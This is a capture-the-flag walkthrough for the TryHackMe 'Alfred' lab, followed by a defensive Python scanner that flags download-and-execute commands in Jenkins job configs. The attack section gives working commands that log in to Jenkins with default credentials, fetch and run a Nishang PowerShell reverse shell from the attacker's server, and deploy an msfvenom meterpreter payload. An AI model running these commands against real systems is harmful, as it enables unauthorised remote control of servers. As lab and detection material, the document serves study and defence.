THM - Alfred
Nmap
nmap -p- -A 10.10.75.158 -o alfred.nmap
Jenkins
http://10.10.75.158:8080
admin:admin
Get initial access
Get payload
https://github.com/samratashok/nishang
Reverse shell
On hacker machine
listener
nc -nvlp 4443
static web server
python3 -m http.server
On target machine
powershell iex (New-Object Net.WebClient).DownloadString('http://10.18.9.175:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.18.9.175 -Port 4443
- Add this script as the Command in Project configuration for Jenkins
Switching Shells
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.18.9.175 LPORT=4442 -f exe -o msf_shell.exe
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.18.9.175:8000/msf_shell.exe','msf_shell.exe')"
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.18.9.175
set LPORT 4442
run
Start-Process "msf_shell.exe"
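Detection
The script below is an added example, not part of the original notes. It scans a Jenkins job config.xml for build-step commands that use the download-and-execute patterns shown above. Assumptions: the Command field is a freestyle build step stored as hudson.tasks.BatchFile (or hudson.tasks.Shell), and the function name, indicator names and sample config are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumption: freestyle build steps live under these elements in config.xml.
STEP_TAGS = {"hudson.tasks.BatchFile", "hudson.tasks.Shell"}

# Indicators drawn from the commands in these notes, matched case-insensitively.
INDICATORS = {
    "download-cradle": re.compile(
        r"net\.webclient\)?\s*\.download(string|file)", re.I),
    "invoke-expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "nishang-tcp-shell": re.compile(r"invoke-powershelltcp", re.I),
}

def scan_job_config(xml_text):
    """Return (step_tag, indicator, command) for each suspicious build step."""
    # Jenkins writes an XML 1.1 declaration; Python's expat-based parser only
    # supports XML 1.0, so drop the declaration before parsing.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text, count=1)
    hits = []
    for step in ET.fromstring(body).iter():
        if step.tag not in STEP_TAGS:
            continue
        command = (step.findtext("command") or "").strip()
        for name, pattern in INDICATORS.items():
            if pattern.search(command):
                hits.append((step.tag, name, command))
    return hits

# Constructed sample: one suspicious step, one ordinary build step.
SAMPLE_CONFIG = """<?xml version='1.1' encoding='UTF-8'?>
<project>
  <builders>
    <hudson.tasks.BatchFile>
      <command>powershell iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8000/script.ps1')</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.BatchFile>
      <command>msbuild app.sln /p:Configuration=Release</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>"""

if __name__ == "__main__":
    for tag, indicator, command in scan_job_config(SAMPLE_CONFIG):
        print(f"{indicator:18} {tag}: {command}")
```

On a controller, run it over each jobs/<name>/config.xml under JENKINS_HOME and review any hit against the job's change history.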